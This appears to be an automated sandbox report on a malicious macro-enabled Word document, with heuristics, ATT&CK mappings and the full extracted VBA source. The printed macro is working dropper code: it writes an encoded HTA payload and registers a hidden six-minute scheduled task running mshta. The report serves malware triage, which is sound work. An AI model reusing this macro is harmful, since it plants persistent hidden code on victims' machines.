MALICIOUS
192
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample is an Office document containing VBA macros, specifically a Document_Open macro that uses CreateObject and references a LOLBin. The embedded VBA script contains obfuscated code that appears to download and execute a second-stage payload. The presence of a macro-enable lure further supports this malicious intent.
Heuristics 8
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
LOLBin reference in VBA critical OLE_VBA_LOLBINLOLBin reference in VBAMatched line in script
Set Action = taskDefinition.Actions.Create(0) Action.Path = "C:\Windows\System32\mshta.exe" Action.Arguments = "C:\ProgramData\Service\update.hta" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Next Set fso = CreateObject("Scripting.FileSystemObject") If Not fso.FolderExists("C:\ProgramData\Service\") Then -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
End Sub Private Sub Document_Open() On Error Resume Next -
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7625 bytes |
SHA-256: a956a301199868dc6b1d62f8ce1367b19e902d4ede607ccad9607d796346b4d1 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 6 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub one()
x = "3c484541443e3c4854413a4150504c49434154494f4e2049443d227570647322204150504c49434154494f4e4e414d453d2273756470222057494e444f5753544154453d226e6f726d616c22204d4158494d495a45425554544f4e3d226e6f22204d494e494d495a45425554544f4e3d226e6f222043415054494f4e3d226e6f222053484f57494e5441534b4241523d226e6f2220424f524445523d226e6f6e65222053494e474c45494e5354414e43453d22796573223e3c2f484541443e3c424f4459205343524f4c4c3d226e6f223e3c7363726970743e77696e646f772e726573697a65546f28302c30293b77696e646f772e6d6f7665546f282d323030302c2d32303030293b3c2f7363726970743e3c7370616e2069643d44617461417265613e313030303c2f7370616e3e3c736372697074204c616e67756167653d2256425363726970742e456e636f6465223e0d0a23407e5e68776b4141413d3d360950334d444b4450222b6b3b3a7f50482b585940234026774578314f6b4b7850342b646034234023402636787e334d4447442c5d2b6b45686e2c312b614f40234026376662682c6c53624023402664734b442c72507b5071503a577e4a7f7860346240234026646c2c787e6c2c5b2c5a344463454c4345504c7e48624e6334426b7e2b622a4023402664627e7b50722c5f2c46"
x = x + "4023402664676e364440234026643420647e7b506c4023402632094e50773b556d446b4b78402340264f6e58597e272c34206b60457f3b2141662479255876572a32762a7e214176462b73577b2a322a2921412158714f4732462a2a4646255a2b58735721382c58267f2b46622a32462a26412a30712b46662b3079622a46572b3247583b637a475a46205758464721542a3b2a30585a202c327b216c466332337f6346325776712a667b325a546238332a79202b712b2a2c7b2b2b73714657663262585a46322076322a38662a32767f263b26312a572041797b215a2a26572a5462382657462a207f6f2b322a3238662a3b2631547946732b242b666632322f6c2c584f464f262c32465a7f212b6324217e4654716c206232302052472c5a54582579475a7354257166385a54415a302a77767b586c633254545a3258635a542b26582b46474776322132582677217b6377212a7f2b7666572f76472673572a5466384157635432666f792a2a5a572a465747662a7a46412b547921582538307921585a467a76266c732b394752462f2a322a7f2a57204179546346214138662a5a6c256c4654662b54794171735a39467a20715447212c7f395720662c326f7926583b213b207632635a2a2a382a7f462b462b7152265a7939212b632a6c242a215a476c7371207b5457267f764654477e26"
x = x + "6f2a6c265a66393266585a572a46217f7a2177262079475a294657632447522a582a772641572f764726732b5454415a26384754622b7f3262715a797f2a7e266654772a2c7b2b2b737b21572a322a584f4641206338665a58467e21332a6c632a717776665a2f465763326c335420572a382c6646667b325a7162382f632b21312b52262a547b38417f472b7f463254416357474646215733473b76712677477f2a792046792b46322a736c2f54216c476c7358212b712b7654636c54264f2a247f3b26762b712b737b76572a79205846465276465a215a2b217946332a7e2a5871462146792a4677632032337f63463232322b76662479262a5a3830465226307f5247262a7f57767b2a6c3179207152213276462b73577b635a632476792a6f71462126792a214f46326c242a47466232667f41582479732a5a572a465726542a6c2a207f6f5a5a5841572a4625717a633b212c4621577b2a466324477e2a31583276477931637e2a73386f585a6c3238327f73583057477f2a38544657762f2a6c46217f6f2b6371265a7b6c66667976326325385a5a2b214f466f267e26296641637679312a6c632a386658266c476c767f73583057472b2c387b2a5a47712b32215a2b71795a2a476c6f3273582b764663416c732b394752263063322a2b71462025792a46322a32577b5473466232667f"
x = x + "4158245a4654206c31473820667146467666392b737f466c6679262a472146206346207931465746666379263966476376573021776320577b713279256c25542166302b212b265a312a38266f2a6c2a41716f5a217f212b2b46207157637a762632623866216c4624213b466f715276662b29466c63206c2a54415a2a6c467146667f2b2a717338392a79267f543246627f662b737b2a6c7b325a2a7e2177635a6c252b33475221666379632a2a4646217933216c2a5a38397166382057266621667b3273712c382f634620582b47465a2b3379415876572a4621717a204f2032325a386646572158637946392a322676327121794663386f2a326c2a6c7671202b2b7920542a38292a6c2058543b46762b712b212a41382479472a774647765a32635a302132217f467e63582a6c2026792a214f2a2a6c2f546238206c262a21586f57637f2a46542a3b20587138212c7154792158466c2f46322a7e217720733276577b2179216f2a382a582a6c2641797f21324666387158266c2a385a54262b71327654733830633247292a462a737f392b632a216c2b327658772177267632765a662146635446572139542b7666572f7647267332292b47384638472a62716f794754256c712a3b20587138212c7154792158466c2f46322a7a2177262079205a30467746302a32762a58792647325863"
x = x + "7e2147386f58735746383258737b5432665425572f2a5a2658543263622b29465a582a6c712b635877213b202a794657582a52632476792a30587920462b716346467638662a32466232667f415824574771735a39632b46316638266354662b735432387f46202a3b2177262079766c242179213063572a312a4626412b71207e2a476c39542c5a206c76542a667b4626666232247646262b71464621666f3241716646663232587e216c202a3247577b466c21332a5a2a582a6c47462b66633846766c24585a5a6338732b73662479622a633871635a2058716c20762b547966582c383079205847464f264632665a312179213376792a582a7726412b392a2b2146386f2b2038206c2c2a626629326271255a31767e2633544646267f713266587657587921584621572620324732664657466663794631717a4732467b6341467338582a5a5741382a2a637171797671326c71215a767f2a3b2a737f39325a5821572a322c2a524641477346212b29477e762b267726317b3220323258212b4747577154413876382c2b41662f7921542c5a24473b21582b52262a7f6f46207126575879632a7a2079462a38737924473b7671267726317b7920467958634647736c587f26466632322b47662f79622a5a7929633826667f5247262a7f79255876572b32252a3b217e635a6c257262402340"
x = x + "262f4f442c277e4572402340267747442c4c507b7e54503a572c536e78634f7f364f232071402340262f4f2e2c2750644f4d5027503b344d60296b6d76486b3960446e36447e255f387e71622a50284b2e507a2f6d765c724e764a7f583672667f68252562224c3b3076547b7d626f7f6609687b3422485e582a354a42604c2c484b5b50642b5560722b7a367d267668304c7a496f24567f2146727a6f7f26554146345d315e7a63354a625138237e71622a2340234026676e585940234026666d596c7a447f43522678552b4d43505c6450272c45597f2f594021645e44627744504a6c554c216c4c2b7b2341556d2e72615952335531575b2b2c5b7f306e4d402a725b2f44444c454021725b2f744d602a7b2a5b4a6b5e44627759402a45402340266853454341413d3d5e237e403c2f7363726970743e3c2f424f44593e3c2f48544d4c3e0d0a"
On Error Resume Next
For i = 1 To Len(x)
a = a & Chr("&H" & Mid(x, i, 2))
i = i + 1
Next
Set fso = CreateObject("Scripting.FileSystemObject")
If Not fso.FolderExists("C:\ProgramData\Service\") Then
fso.CreateFolder ("C:\ProgramData\Service\")
End If
Set OutPutFile = fso.CreateTextFile("C:\ProgramData\Service\update.txt", True)
OutPutFile.Write a
OutPutFile.Close
If fso.FileExists("C:\ProgramData\Service\update.hta") Then
fso.DeleteFile ("C:\ProgramData\Service\update.hta")
End If
fso.MoveFile "C:\ProgramData\Service\update.txt", "C:\ProgramData\Service\update.hta"
End Sub
Private Sub two()
On Error Resume Next
Set service = CreateObject("Schedule.Service")
Call service.Connect
Set taskDefinition = service.NewTask(0)
Set settings = taskDefinition.settings
settings.Enabled = True
settings.Hidden = True
Set trigger = taskDefinition.triggers.Create(1)
trigger.StartBoundary = Year(Now) & "-" & Right("0" & Month(Now), 2) & "-" & Right("0" & Day(Now), 2) & "T" & Right("0" & Hour(Now), 2) & ":" & Right("0" & Minute(Now), 2) & ":" & Right("0" & Second(Now), 2)
trigger.Enabled = True
trigger.Repetition.Interval = "PT6M"
Set Action = taskDefinition.Actions.Create(0)
Action.Path = "C:\Windows\System32\mshta.exe"
Action.Arguments = "C:\ProgramData\Service\update.hta"
Call service.GetFolder("\").RegisterTaskDefinition("Update Service", taskDefinition, 6, , , 3)
End Sub
Private Sub Document_Open()
On Error Resume Next
ActiveDocument.Shapes(1).Delete
ActiveDocument.Shapes(1).Delete
one
two
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 24064 bytes |
SHA-256: 546fe2d096118cbc0ceea04d121638905fbfbec25e764447b06abe4e48384fbd |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 7 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.